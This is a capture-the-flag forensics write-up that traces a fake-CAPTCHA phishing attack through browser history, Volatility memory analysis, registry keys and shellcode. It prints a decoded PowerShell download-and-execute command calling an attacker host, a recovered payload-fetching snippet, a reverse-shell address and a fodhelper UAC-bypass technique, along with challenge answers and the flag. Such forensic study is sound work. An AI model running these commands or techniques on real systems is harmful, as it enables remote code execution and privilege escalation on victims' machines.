WannaGame Championship 2025-Writeup
Hide and Seek – Forensic Investigation Report
The victim reported that after browsing and downloading some files, suspicious processes began appearing on the system. Our objective is to reconstruct the attack chain and identify the adversary’s techniques.
[1] MITRE ATT&CK ID for Initial Access (TXXXX.XXX)
Browser history analysis (Firefox) revealed that the user accessed a suspicious internal URL shortly before malicious activity began.
There is no indication of an exploit chain or drive-by download. Instead, the evidence suggests that the victim was socially engineered into clicking a malicious link.
This behavior aligns with:
Phishing via malicious link
MITRE ATT&CK mapping:
Answer: T1566.002
[2] Which link did the victim access? (ASCII)
The final suspicious entry in the browser history shows:
http://192.168.1.11:7331/captcha.html
This appears to be a fake CAPTCHA page used to trick the victim into executing a command.
Answer:
http://192.168.1.11:7331/captcha.html
[3] What command was the victim tricked into executing? (ASCII)
Using the cmdline plugin in Volatility, we examined process command-line arguments and identified a PowerShell process running a base64-encoded payload:
powershell.exe -eC aQB3AHIAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAxADoANwAzADMAMQAvAHkALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA
After decoding the base64 string:
iwr http://192.168.1.11:7331/y.ps1 -UseBasicParsing | iex
Explanation:
iwr→ Invoke-WebRequestDownloads
y.ps1Pipes output to
iex(Invoke-Expression)Executes it directly in memory
This is a typical “download-and-execute” technique.
Answer:
powershell.exe -eC aQB3AHIAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAxADoANwAzADMAMQAvAHkALgBwAHMAMQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAaQBlAHgA
[4] What URL was used to retrieve the payload and what filename was it saved as?
(http://example.com/script.ext_file.rar)
After dumping the PowerShell process memory (PID 3000), we recovered the executed script content.
The script:
Downloads
update.zipSaves it as
kqwer.zipin%TEMP%Extracts it
Executes
verify.exe
Relevant snippet recovered from memory:
$url1 = "http://192.168.1.11:7331/update.zip"
$zipPath1 = "$env:TEMP\kqwer.zip"
Therefore:
Script URL:
http://192.168.1.11:7331/y.ps1Saved filename:
kqwer.zip
Answer:
http://192.168.1.11:7331/y.ps1_kqwer.zip
[5] MITRE ID and Registry location (TXXXX_Hive\Key)
Process tree analysis showed:
explorer.exe → powershell.exe
This strongly indicates execution via the Windows Run dialog (Win + R).
To confirm, we examined the following registry key:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
This key stores commands executed via the Run dialog.
The corresponding MITRE technique:
User Execution
Answer:
T1204_HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
[6] Malicious file location and injected process (C:\path\folder\A_processA.ext_1234)
The downloaded archive extracted and executed:
verify.exe
Static analysis using IDA revealed:
The binary decrypts embedded shellcode using XOR
Key used:
6ddLG9a8gc69cf4J0bZrzgGjr9zRMRThe decrypted shellcode is injected into
explorer.exe
Observed process hierarchy:
explorer.exe (PID 6500)
└── powershell.exe (3000)
└── verify.exe
Malware location:
C:\Users\imnoob\AppData\Local\Temp\file
Injected process:
explorer.exe (PID 6500)
Answer:
C:\Users\imnoob\AppData\Local\Temp\file_explorer.exe_6500
[7] Attacker IP and PORT inside injected shellcode (IP:PORT)
After decrypting the shellcode and disassembling it, we found:
PUSH 0B01A8C0
PUSH A5FB0002
Converting from little-endian:
C0 A8 01 0B → 192.168.1.11
A5 FB → 64421
This indicates a reverse shell connection.
Answer:
192.168.1.11:64421
[8] Process used for UAC bypass and PPID spoofing (ProcessA.ext_1234)
Further analysis showed:
powershell.exe -ExecutionPolicy Bypass
→ fodhelper.exe
fodhelper.exe is a known auto-elevated binary frequently abused for UAC bypass.
Observed relationship:
powershell.exe (PID 5888)
└── fodhelper.exe (PID 2964)
This confirms privilege escalation via UAC bypass.
Answer:
fodhelper.exe_5888
Final Flag
W1{conGR4TUIaTi0N5-9OU-Fin4ILy-fOUND-m3!ll10dc}
Stay Updated
Get the latest posts, security insights, and tech updates delivered straight to your inbox. No spam, unsubscribe anytime.
Comments
💬 No account required — Just drop your thoughts below!